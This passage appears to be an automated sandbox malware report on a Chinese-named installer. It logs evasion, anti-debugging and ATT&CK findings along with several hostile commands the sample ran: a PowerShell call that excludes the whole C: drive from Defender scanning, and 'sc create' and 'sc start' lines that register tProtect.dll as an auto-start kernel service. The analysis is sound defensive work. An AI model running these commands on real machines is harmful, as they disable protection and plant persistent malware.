Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6399Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3256Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWindow / User API: threadDelayed 530Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWindow / User API: threadDelayed 533Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWindow / User API: threadDelayed 505Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V2BM7.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-PMC4V.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-AQRNC.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0BAEC0 FindFirstFileA,FindClose,FindClose,6_2_6C0BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00AD6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00AD7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00AD9C60 GetSystemInfo,10_2_00AD9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.4.tmp, 00000001.00000002.1795152504.000000000178C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6BF43886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6BF43886
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C0D0181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B557D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00B557D0
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0D9D35 mov eax, dword ptr fs:[00000030h]6_2_6C0D9D35
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0D9D66 mov eax, dword ptr fs:[00000030h]6_2_6C0D9D66
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0CF17D mov eax, dword ptr fs:[00000030h]6_2_6C0CF17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0C8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C0C8CBD
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C0D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C0D0181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpCode function: 6_2_6C197700 cpuid 6_2_6C197700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00ADAB2A GetSystemTimeAsFileTime,10_2_00ADAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B70090 GetVersion,10_2_00B70090
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmpWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory431
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
